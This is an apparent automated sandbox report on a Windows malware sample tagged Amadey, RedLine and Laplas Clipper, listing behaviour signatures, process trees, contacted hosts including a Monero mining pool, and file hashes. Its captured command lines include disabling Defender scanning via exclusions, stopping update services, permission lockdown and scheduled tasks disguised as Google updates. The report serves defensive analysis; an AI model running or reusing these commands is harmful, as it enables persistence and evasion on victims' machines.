Malware Analysis Report

2024-10-23 15:42

Sample ID 230726-femdashc27
Target 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
Tags
vmprotect amadey laplas clipper evasion persistence stealer themida trojan redline infostealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff

Threat Level: Known bad

The file 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff was found to be: Known bad.

Malicious Activity Summary

vmprotect amadey laplas clipper evasion persistence stealer themida trojan redline infostealer

RedLine

RedLine payload

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

Laplas Clipper

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Executes dropped EXE

VMProtect packed file

Checks BIOS information in registry

Loads dropped DLL

Themida packer

Adds Run key to start application

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

GoLang User-Agent

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-26 04:47

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-26 04:47

Reported

2023-07-26 04:52

Platform

win7-20230712-en

Max time kernel

227s

Max time network

303s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Laplas Clipper

stealer clipper laplas

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2336 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2336 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2336 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2336 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2124 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2124 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 1384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 1384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 1384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 1384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 3036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2432 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1784 wrote to memory of 1868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 1868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 1868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 1868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 2664 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 2664 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 2664 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 2664 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 896 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 896 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 896 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 896 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2124 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe
PID 2124 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe
PID 2124 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe
PID 2124 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe
PID 2124 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe
PID 2124 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe
PID 2124 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe
PID 2124 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe
PID 2172 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
PID 2172 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
PID 2172 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
PID 1784 wrote to memory of 2296 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 2296 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 2296 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1784 wrote to memory of 2296 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2460 wrote to memory of 2544 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe

"C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Windows\system32\taskeng.exe

taskeng.exe {C1D7B51C-4B78-4920-816D-9A84B64D2D03} S-1-5-21-722410544-1258951091-1992882075-1000:MGKTNXNO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

"C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe"

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

"C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe"

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {B107125E-6E02-41D5-8259-F2006115F2D8} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 second.amadgood.com udp
NL 45.15.156.208:80 45.15.156.208 tcp
NL 45.15.156.208:80 tcp
NL 45.15.156.208:80 45.15.156.208 tcp
NL 194.180.49.153:80 194.180.49.153 tcp
US 206.189.229.43:80 206.189.229.43 tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp

Files

memory/2336-54-0x00000000000F0000-0x00000000000F1000-memory.dmp

memory/2336-56-0x0000000000C30000-0x00000000013D9000-memory.dmp

memory/2336-57-0x00000000000F0000-0x00000000000F1000-memory.dmp

memory/2336-60-0x00000000000F0000-0x00000000000F1000-memory.dmp

memory/2336-61-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2336-59-0x0000000000C30000-0x00000000013D9000-memory.dmp

memory/2336-63-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2336-65-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2336-68-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2336-70-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2336-73-0x0000000000120000-0x0000000000121000-memory.dmp

memory/2336-75-0x0000000000120000-0x0000000000121000-memory.dmp

memory/2336-78-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2336-80-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2336-83-0x0000000000190000-0x0000000000191000-memory.dmp

memory/2336-85-0x0000000000190000-0x0000000000191000-memory.dmp

memory/2336-89-0x00000000004E0000-0x00000000004E1000-memory.dmp

\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

memory/2336-98-0x0000000000C30000-0x00000000013D9000-memory.dmp

memory/2124-101-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/2124-102-0x00000000000C0000-0x00000000000C1000-memory.dmp

memory/2124-104-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/2124-105-0x00000000000C0000-0x00000000000C1000-memory.dmp

memory/2124-108-0x00000000000D0000-0x00000000000D1000-memory.dmp

memory/2124-110-0x00000000000D0000-0x00000000000D1000-memory.dmp

memory/2124-113-0x0000000000170000-0x0000000000171000-memory.dmp

memory/2124-115-0x0000000000170000-0x0000000000171000-memory.dmp

memory/2124-118-0x0000000000180000-0x0000000000181000-memory.dmp

memory/2124-120-0x0000000000180000-0x0000000000181000-memory.dmp

memory/2124-123-0x0000000000190000-0x0000000000191000-memory.dmp

memory/2124-125-0x0000000000190000-0x0000000000191000-memory.dmp

memory/2124-130-0x00000000001A0000-0x00000000001A1000-memory.dmp

memory/2124-128-0x00000000001A0000-0x00000000001A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

C:\Users\Admin\AppData\Local\Temp\224105441258

